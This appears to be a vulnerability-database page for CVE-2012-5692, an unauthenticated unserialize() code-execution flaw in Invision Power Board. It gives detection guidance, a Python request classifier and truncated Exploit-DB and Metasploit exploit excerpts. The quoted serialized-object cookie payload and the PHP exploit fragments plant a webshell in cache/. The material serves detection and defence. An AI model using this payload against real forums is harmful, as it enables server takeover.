CVE-2012-5692
Published 2012-10-31
Priority: P261 · critical · 10 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 24.91% (97.6th percentile)
Unspecified vulnerability in admin/sources/base/core.php in Invision Power Board (aka IPB or IP.Board) 3.1.x through 3.3.x has unknown impact and remote attack vectors.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| invisioncommunity | invision_power_board | — | — |
| invisioncommunity | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
| invisionpower | invision_power_board | — | — |
Detection & IOCs
Cookie: member_id=a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}
- Detect exploitation attempts via the member_id cookie containing a serialized PHP object payload targeting the db_driver_mysql class with use_debug_log and debug_log keys.
- Alert on GET requests to index.php accompanied by a member_id cookie value containing PHP serialization syntax (e.g., 'O:+15:"db_driver_mysql"' or 'O:15:"db_driver_mysql"'), indicating unserialize regex bypass attempts.
- Monitor for creation of or GET requests to files under the cache/ directory with a .php extension, as the exploit writes a webshell to cache/sh.php or a random-named .php file in cache/.
- Detect HTTP requests to cache/*.php that include a 'Cmd:' header, which is the webshell command execution mechanism used by the exploit.
- The exploit abuses the __destruct() method from the dbMain class to write arbitrary PHP code; monitor for unexpected PHP file creation in the IPB web directory's cache/ folder.
- The regex bypass variant uses 'O:+15:' (with a leading plus sign) to evade unserialize input validation; detection signatures must account for both 'O:15:' and 'O:+15:' serialized object prefixes.
- The Metasploit module uses a randomly named PHP file (rand_text_alpha) in the cache/ directory rather than the fixed 'sh.php' name; file-name-based detection alone is insufficient.
- The vulnerability is exploitable unauthenticated; no session or login is required, so authentication-based controls do not mitigate the attack vector.
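The checks listed above, combined into one request classifier as an added example (not part of the original page or of any published detection rule). The request record layout, the label names and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import quote, unquote

# "O:", optional "+", a length, then a quoted class name: matches both the
# 'O:15:' and the 'O:+15:' prefixes the page calls out.
SERIALIZED_OBJECT = re.compile(r'O:\+?\d+:"\w+"')
# The cookie may carry a board-specific prefix, so match on the name's suffix.
MEMBER_ID = re.compile(r'\b\w*member_id=([^;]*)')
# Any .php file directly under cache/, since the file name may be random.
CACHE_PHP = re.compile(r'/cache/[^/?]+\.php(?:\?|$)', re.IGNORECASE)

def findings(request):
    """Return the detection labels that apply to one parsed HTTP request."""
    headers = {k.lower(): v for k, v in request["headers"].items()}
    hits = []
    cookie = MEMBER_ID.search(headers.get("cookie", ""))
    # unquote() keeps a literal '+', which unquote_plus() would turn into a space.
    if cookie and SERIALIZED_OBJECT.search(unquote(cookie.group(1))):
        hits.append("member_id-serialized-object")
    if CACHE_PHP.search(request["path"]):
        hits.append("cache-php-request")
        if "cmd" in headers:
            hits.append("cmd-header")
    return hits

# Constructed sample requests (not captured traffic). The cookie bodies are the
# serialized strings quoted on this page, URL-encoded as a client would send them.
PLUS = 'a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}'
SAMPLES = [
    {"path": "/ipb/index.php", "headers": {"Cookie": "ipb_member_id=" + quote(PLUS, safe="")}},
    {"path": "/ipb/index.php", "headers": {"Cookie": "member_id=" + quote(PLUS.replace("O:+15:", "O:15:"), safe="")}},
    {"path": "/ipb/index.php", "headers": {"Cookie": "ipb_member_id=42; ipb_session_id=abc"}},
    {"path": "/ipb/cache/QzKxWp.php", "headers": {"Cmd": "(constructed placeholder)"}},
    {"path": "/ipb/cache/other.php", "headers": {}},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample["path"], findings(sample))
```

A bare `cache-php-request` hit is the weakest signal of the three and is best correlated with file-creation monitoring on the cache/ folder.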
No detection rules found.
Exploit-DB
Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution (Metasploit)
exploitdb·2012-11-13
---
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'Invision IP.Board %q{
This module exploits a php unserialize() vulnerability in Invision IP.Board
[
'EgiX', # Vulnerability discovery and PoC
'juan vazquez', # Metasploit module
'sinn3r' # PhpEXE tekniq & check() method
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-5692' ],
[ 'OSVDB', '86702' ],
[ 'BID', '56288' ],
[ 'EDB', '22398' ],
[ 'URL', 'http://community.invisionpower.com/topic/371625-ipboard-31x-32x-an
```
Exploit-DB
Invision Power Board (IP.Board) 3.3.4 - Unserialize Regex Bypass
exploitdb·2012-11-07
---
```php
\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /ipb/\n";
die();
}
list($host, $path) = array($argv[1], $argv[2]);
$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';
class db_driver_mysql
{
    public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}
# Super bypass by @i0n1c
$payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}');
$phpcode = '';
$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet
```
Exploit-DB
Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution
exploitdb·2012-11-01
---
```php
\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /ipb/\n";
die();
}
list($host, $path) = array($argv[1], $argv[2]);
$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';
class db_driver_mysql
{
    public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}
$payload = urlencode(serialize(array(new db_driver_mysql)));
$phpcode = '';
$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "C
```
Metasploit
Invision IP.Board unserialize() PHP Code Execution
metasploit
This module exploits a php unserialize() vulnerability in Invision IP.Board <= 3.3.4 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the webserver user. The dangerous unserialize() exists in the '/admin/sources/base/core.php' script, which is called with user controlled data from the cookie. The exploit abuses the __destruct() method from the dbMain class to write arbitrary PHP code to a file on the Invision IP.Board web directory. The exploit has been tested successfully on Invision IP.Board 3.3.4.
No writeups or analysis indexed.
- http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-security-update/
- http://secunia.com/advisories/51104
- http://www.securityfocus.com/bid/56288
Published: 2012-10-31